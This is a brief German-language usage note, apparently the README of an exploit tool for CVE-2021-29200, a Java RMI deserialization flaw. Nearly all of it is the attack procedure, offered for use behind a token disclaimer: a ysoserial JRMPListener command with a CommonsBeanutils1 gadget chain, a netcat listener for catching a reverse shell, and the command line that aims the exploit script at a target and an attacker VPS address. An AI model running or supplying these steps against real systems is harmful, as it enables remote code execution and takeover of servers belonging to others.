
Exploit für CVE-2021-29200, der Remote-Codeausführung über einen RMI-Deserialisierungsangriff mit JRMP-Listener und Zustellung von Reverse-Shell-Payloads ermöglicht.
CVE-2021-29200 EXP kann erfolgreich eine Reverse-Shell auslösen
Dieser Artikel und das Tool dienen ausschließlich der technischen Weitergabe. Eine Verwendung für illegale Zwecke ist strengstens untersagt; andernfalls trägt der Nutzer alle daraus entstehenden Konsequenzen selbst.
RMI-Listener auf Port 9999java -cp ysoserial.jar ysoserial.exploit.JRMPListener 9999 CommonsBeanutils1 '[要执行的命令]'
nc8443nc -lvp 8443
python3 cve-2021-29200_exp.py <target> <vps_ip> <vps_port>
